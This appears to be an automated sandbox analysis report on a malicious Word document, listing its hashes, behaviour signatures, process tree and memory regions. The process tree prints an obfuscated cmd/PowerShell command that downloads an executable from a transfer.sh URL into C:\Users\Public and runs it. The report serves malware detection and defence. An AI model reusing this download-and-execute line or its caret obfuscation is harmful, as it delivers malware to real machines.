Analysis

  • max time kernel
    117s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    14-09-2023 15:19

General

  • Target

    17cfb90deb531e2068d99e671423d8d1bcf8f06a0e2666f0108ca8e8b706dd1b.doc

  • Size

    191KB

  • MD5

    68297123bc1ddbbd9336aa121a9dd534

  • SHA1

    2d8016319edb893e0ae600ba8c89f00a30466967

  • SHA256

    17cfb90deb531e2068d99e671423d8d1bcf8f06a0e2666f0108ca8e8b706dd1b

  • SHA512

    29e3e9e7e8a1b5c9fd54d97379e7f73cc2ee8174b950d7bf1b44f6f129893d6dec64c8ddb63f071184ea93bc88f1e5b7d0e1f99304c4af54f42af9042f6d092b

  • SSDEEP

    3072:SbiyWTxSoVHpNY6nemhInf/va46YP6z+dzL:miyWTwoVHp6m0/yl6H9L

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\17cfb90deb531e2068d99e671423d8d1bcf8f06a0e2666f0108ca8e8b706dd1b.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:320
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/gj04sqKk7O/boat.e^xe -o C:\Users\Public\dx5ys.exe;C:\Users\Public\dx5ys.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2188
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/gj04sqKk7O/boat.exe -o C:\Users\Public\dx5ys.exe;C:\Users\Public\dx5ys.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2632

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/320-20-0x000000002F9A0000-0x000000002FAFD000-memory.dmp
      Filesize

      1.4MB

    • memory/320-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/320-2-0x00000000717DD000-0x00000000717E8000-memory.dmp
      Filesize

      44KB

    • memory/320-5-0x0000000000590000-0x0000000000690000-memory.dmp
      Filesize

      1024KB

    • memory/320-7-0x0000000000590000-0x0000000000690000-memory.dmp
      Filesize

      1024KB

    • memory/320-6-0x0000000000590000-0x0000000000690000-memory.dmp
      Filesize

      1024KB

    • memory/320-0-0x000000002F9A0000-0x000000002FAFD000-memory.dmp
      Filesize

      1.4MB

    • memory/320-22-0x0000000000590000-0x0000000000690000-memory.dmp
      Filesize

      1024KB

    • memory/320-21-0x00000000717DD000-0x00000000717E8000-memory.dmp
      Filesize

      44KB

    • memory/2332-11-0x000000006AE50000-0x000000006B3FB000-memory.dmp
      Filesize

      5.7MB

    • memory/2332-19-0x000000006AE50000-0x000000006B3FB000-memory.dmp
      Filesize

      5.7MB

    • memory/2332-13-0x0000000002730000-0x0000000002770000-memory.dmp
      Filesize

      256KB

    • memory/2332-14-0x0000000002730000-0x0000000002770000-memory.dmp
      Filesize

      256KB

    • memory/2332-12-0x000000006AE50000-0x000000006B3FB000-memory.dmp
      Filesize

      5.7MB